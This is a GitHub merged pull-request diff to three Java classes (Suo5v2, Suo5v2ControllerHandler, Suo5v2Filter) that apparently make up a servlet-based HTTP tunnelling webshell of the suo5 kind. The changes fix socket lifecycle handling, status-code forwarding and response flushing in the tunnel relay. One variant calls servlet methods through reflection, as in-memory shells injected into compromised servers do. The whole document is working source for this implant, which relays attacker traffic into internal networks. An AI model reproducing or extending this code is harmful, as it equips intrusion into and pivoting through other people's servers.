Skip to content
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
Expand Up @@ -248,8 +248,9 @@ private boolean processRedirect(Object req, Object resp, HashMap dataMap, byte[]
baos.write(bodyContent);
byte[] newBody = baos.toByteArray();
conn = redirect(req, new String(redirectData), newBody);
resp.getClass().getMethod("setStatus", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(conn.getResponseCode())});
OutputStream out = (OutputStream) resp.getClass().getMethod("getOutputStream").invoke(resp);
pipeStream(conn.getInputStream(), out, false);
pipeStream(conn.getInputStream(), out, resp, false);
} finally {
if (conn != null) {
conn.disconnect();
Expand Down Expand Up @@ -346,11 +347,10 @@ private void processFullStream(Object req, Object resp, HashMap dataMap, String

Thread t = null;
boolean sendClose = true;
final OutputStream scOutStream = socket.getOutputStream();
final InputStream scInStream = socket.getInputStream();
final OutputStream respOutputStream = (OutputStream) resp.getClass().getMethod("getOutputStream").invoke(resp);
try {
final OutputStream scOutStream = socket.getOutputStream();
final InputStream scInStream = socket.getInputStream();
final OutputStream respOutputStream = (OutputStream) resp.getClass().getMethod("getOutputStream").invoke(resp);

Suo5v2 p = new Suo5v2(scInStream, respOutputStream, tunId);
t = new Thread(p);
t.start();
Expand Down Expand Up @@ -539,8 +539,8 @@ private void performWrite(HashMap dataMap, String tunId, boolean newThread) thro
throw new IOException("tunnel not found");
}
SocketChannel sc = (SocketChannel) objs[0];
if (!sc.isConnected()) {
throw new IOException("socket not connected");
if (!sc.isOpen()) {
return;
}

byte[] data = (byte[]) dataMap.get("dt");
Expand All @@ -563,9 +563,6 @@ private byte[] performRead(String tunId) throws Exception {
throw new IOException("tunnel not found");
}
SocketChannel sc = (SocketChannel) objs[0];
if (!sc.isConnected()) {
throw new IOException("socket not connected");
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
BlockingQueue<byte[]> readQueue = (BlockingQueue<byte[]>) objs[1];
int maxSize = 512 * 1024; // 1MB
Expand All @@ -582,6 +579,10 @@ private byte[] performRead(String tunId) throws Exception {
break; // no more data
}
}
if (!sc.isOpen() && readQueue.isEmpty()) {
performDelete(tunId);
baos.write(marshalBase64(newDel(tunId)));
}
return baos.toByteArray();
}

Expand Down Expand Up @@ -610,7 +611,7 @@ private int getServerPort(Object request) throws Exception {
return port;
}

private void pipeStream(InputStream inputStream, OutputStream outputStream, boolean needMarshal) throws Exception {
private void pipeStream(InputStream inputStream, OutputStream outputStream, Object resp, boolean needMarshal) throws Exception {
try {
byte[] readBuf = new byte[1024 * 8];
while (true) {
Expand All @@ -624,6 +625,9 @@ private void pipeStream(InputStream inputStream, OutputStream outputStream, bool
}
outputStream.write(dataTmp);
outputStream.flush();
if (resp != null) {
resp.getClass().getMethod("flushBuffer").invoke(resp);
}
}
} finally {
// don't close outputStream
Expand Down Expand Up @@ -1031,7 +1035,7 @@ public void run() {
// full stream
if (this.mode == 0) {
try {
pipeStream(gInStream, gOutStream, true);
pipeStream(gInStream, gOutStream, null, true);
} catch (Exception ignore) {
}
return;
Expand Down Expand Up @@ -1065,10 +1069,17 @@ public void run() {
// write thread
while (true) {
byte[] data = writeQueue.poll(300, TimeUnit.SECONDS);
if (data == null || data.length == 0) {
if (data == null) {
selfClean = true;
break;
}
if (data.length == 0) {
byte[] signal = writeQueue.poll(10, TimeUnit.SECONDS);
if (signal == null) {
selfClean = true;
}
break;
}
ByteBuffer buf = ByteBuffer.wrap(data);
while (buf.hasRemaining()) {
sc.write(buf);
Expand All @@ -1080,8 +1091,8 @@ public void run() {
if (selfClean) {

removeKey(this.gtunId);
readQueue.clear();
}
readQueue.clear();
writeQueue.clear();
try {
writeQueue.put(new byte[0]);
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -229,7 +229,8 @@ private boolean processRedirect(HttpServletRequest req, HttpServletResponse resp
baos.write(bodyContent);
byte[] newBody = baos.toByteArray();
conn = redirect(req, new String(redirectData), newBody);
pipeStream(conn.getInputStream(), resp.getOutputStream(), false);
resp.setStatus(conn.getResponseCode());
pipeStream(conn.getInputStream(), resp.getOutputStream(), resp, false);
} finally {
if (conn != null) {
conn.disconnect();
Expand Down Expand Up @@ -325,10 +326,13 @@ private void processFullStream(HttpServletRequest req, HttpServletResponse resp,

Thread t = null;
boolean sendClose = true;
OutputStream scOutStream = null;
InputStream scInStream = null;
OutputStream respOutputStream = null;
try {
final OutputStream scOutStream = socket.getOutputStream();
final InputStream scInStream = socket.getInputStream();
final OutputStream respOutputStream = resp.getOutputStream();
scOutStream = socket.getOutputStream();
scInStream = socket.getInputStream();
respOutputStream = resp.getOutputStream();

Suo5v2ControllerHandler p = new Suo5v2ControllerHandler(scInStream, respOutputStream, tunId);
t = new Thread(p);
Expand Down Expand Up @@ -519,8 +523,8 @@ private void performWrite(HashMap dataMap, String tunId, boolean newThread) thro
throw new IOException("tunnel not found");
}
SocketChannel sc = (SocketChannel) objs[0];
if (!sc.isConnected()) {
throw new IOException("socket not connected");
if (!sc.isOpen()) {
return;
}

byte[] data = (byte[]) dataMap.get("dt");
Expand All @@ -543,9 +547,6 @@ private byte[] performRead(String tunId) throws Exception {
throw new IOException("tunnel not found");
}
SocketChannel sc = (SocketChannel) objs[0];
if (!sc.isConnected()) {
throw new IOException("socket not connected");
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
BlockingQueue<byte[]> readQueue = (BlockingQueue<byte[]>) objs[1];
int maxSize = 512 * 1024; // 1MB
Expand All @@ -562,6 +563,10 @@ private byte[] performRead(String tunId) throws Exception {
break; // no more data
}
}
if (!sc.isOpen() && readQueue.isEmpty()) {
performDelete(tunId);
baos.write(marshalBase64(newDel(tunId)));
}
return baos.toByteArray();
}

Expand Down Expand Up @@ -590,7 +595,7 @@ private int getServerPort(HttpServletRequest request) throws Exception {
return port;
}

private void pipeStream(InputStream inputStream, OutputStream outputStream, boolean needMarshal) throws Exception {
private void pipeStream(InputStream inputStream, OutputStream outputStream, HttpServletResponse resp, boolean needMarshal) throws Exception {
try {
byte[] readBuf = new byte[1024 * 8];
while (true) {
Expand All @@ -604,6 +609,9 @@ private void pipeStream(InputStream inputStream, OutputStream outputStream, bool
}
outputStream.write(dataTmp);
outputStream.flush();
if (resp != null) {
resp.flushBuffer();
}
}
} finally {
// don't close outputStream
Expand Down Expand Up @@ -1011,7 +1019,7 @@ public void run() {
// full stream
if (this.mode == 0) {
try {
pipeStream(gInStream, gOutStream, true);
pipeStream(gInStream, gOutStream, null, true);
} catch (Exception ignore) {
}
return;
Expand Down Expand Up @@ -1045,10 +1053,17 @@ public void run() {
// write thread
while (true) {
byte[] data = writeQueue.poll(300, TimeUnit.SECONDS);
if (data == null || data.length == 0) {
if (data == null) {
selfClean = true;
break;
}
if (data.length == 0) {
byte[] signal = writeQueue.poll(10, TimeUnit.SECONDS);
if (signal == null) {
selfClean = true;
}
break;
}
ByteBuffer buf = ByteBuffer.wrap(data);
while (buf.hasRemaining()) {
sc.write(buf);
Expand All @@ -1060,8 +1075,8 @@ public void run() {
if (selfClean) {

removeKey(this.gtunId);
readQueue.clear();
}
readQueue.clear();
writeQueue.clear();
try {
writeQueue.put(new byte[0]);
Expand Down
Original file line number Diff line number Diff line change
Expand Up @@ -234,7 +234,8 @@ private boolean processRedirect(HttpServletRequest req, HttpServletResponse resp
baos.write(bodyContent);
byte[] newBody = baos.toByteArray();
conn = redirect(req, new String(redirectData), newBody);
pipeStream(conn.getInputStream(), resp.getOutputStream(), false);
resp.setStatus(conn.getResponseCode());
pipeStream(conn.getInputStream(), resp.getOutputStream(), resp, false);
} finally {
if (conn != null) {
conn.disconnect();
Expand Down Expand Up @@ -330,10 +331,13 @@ private void processFullStream(HttpServletRequest req, HttpServletResponse resp,

Thread t = null;
boolean sendClose = true;
OutputStream scOutStream = null;
InputStream scInStream = null;
OutputStream respOutputStream = null;
try {
final OutputStream scOutStream = socket.getOutputStream();
final InputStream scInStream = socket.getInputStream();
final OutputStream respOutputStream = resp.getOutputStream();
scOutStream = socket.getOutputStream();
scInStream = socket.getInputStream();
respOutputStream = resp.getOutputStream();

Suo5v2Filter p = new Suo5v2Filter(scInStream, respOutputStream, tunId);
t = new Thread(p);
Expand Down Expand Up @@ -524,8 +528,8 @@ private void performWrite(HashMap dataMap, String tunId, boolean newThread) thro
throw new IOException("tunnel not found");
}
SocketChannel sc = (SocketChannel) objs[0];
if (!sc.isConnected()) {
throw new IOException("socket not connected");
if (!sc.isOpen()) {
return;
}

byte[] data = (byte[]) dataMap.get("dt");
Expand All @@ -548,9 +552,6 @@ private byte[] performRead(String tunId) throws Exception {
throw new IOException("tunnel not found");
}
SocketChannel sc = (SocketChannel) objs[0];
if (!sc.isConnected()) {
throw new IOException("socket not connected");
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
BlockingQueue<byte[]> readQueue = (BlockingQueue<byte[]>) objs[1];
int maxSize = 512 * 1024; // 1MB
Expand All @@ -567,6 +568,10 @@ private byte[] performRead(String tunId) throws Exception {
break; // no more data
}
}
if (!sc.isOpen() && readQueue.isEmpty()) {
performDelete(tunId);
baos.write(marshalBase64(newDel(tunId)));
}
return baos.toByteArray();
}

Expand Down Expand Up @@ -595,7 +600,7 @@ private int getServerPort(HttpServletRequest request) throws Exception {
return port;
}

private void pipeStream(InputStream inputStream, OutputStream outputStream, boolean needMarshal) throws Exception {
private void pipeStream(InputStream inputStream, OutputStream outputStream, HttpServletResponse resp, boolean needMarshal) throws Exception {
try {
byte[] readBuf = new byte[1024 * 8];
while (true) {
Expand All @@ -609,6 +614,9 @@ private void pipeStream(InputStream inputStream, OutputStream outputStream, bool
}
outputStream.write(dataTmp);
outputStream.flush();
if (resp != null) {
resp.flushBuffer();
}
}
} finally {
// don't close outputStream
Expand Down Expand Up @@ -1016,7 +1024,7 @@ public void run() {
// full stream
if (this.mode == 0) {
try {
pipeStream(gInStream, gOutStream, true);
pipeStream(gInStream, gOutStream, null, true);
} catch (Exception ignore) {
}
return;
Expand Down Expand Up @@ -1050,10 +1058,17 @@ public void run() {
// write thread
while (true) {
byte[] data = writeQueue.poll(300, TimeUnit.SECONDS);
if (data == null || data.length == 0) {
if (data == null) {
selfClean = true;
break;
}
if (data.length == 0) {
byte[] signal = writeQueue.poll(10, TimeUnit.SECONDS);
if (signal == null) {
selfClean = true;
}
break;
}
ByteBuffer buf = ByteBuffer.wrap(data);
while (buf.hasRemaining()) {
sc.write(buf);
Expand All @@ -1065,8 +1080,8 @@ public void run() {
if (selfClean) {

removeKey(this.gtunId);
readQueue.clear();
}
readQueue.clear();
writeQueue.clear();
try {
writeQueue.put(new byte[0]);
Expand Down
Loading